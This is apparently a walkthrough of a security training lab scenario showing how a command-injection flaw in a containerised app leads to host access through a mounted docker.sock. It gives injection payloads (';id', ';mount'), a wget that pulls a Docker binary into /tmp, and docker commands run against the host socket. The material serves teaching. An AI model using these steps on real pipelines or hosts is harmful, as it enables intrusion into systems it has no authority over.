DIND (docker-in-docker) exploitation

Scenario Information

Most of the CI/CD and pipeline systems that use Docker and build containers for you within the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to the host system.

Scenario 2 welcome

Scenario Solution

  • By looking at application functionality, identified that it has command injection vulnerability
127.0.0.1; id

Scenario 2 Command Injection

  • After performing quite some analysis, identified the there is a docker.sock mount available in the file system
;mount

Scenario 2 mount

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
  • Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

  • Access the host system by running the following docker commands with docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 list host containers Scenario 2 list host images

Miscellaneous

TBD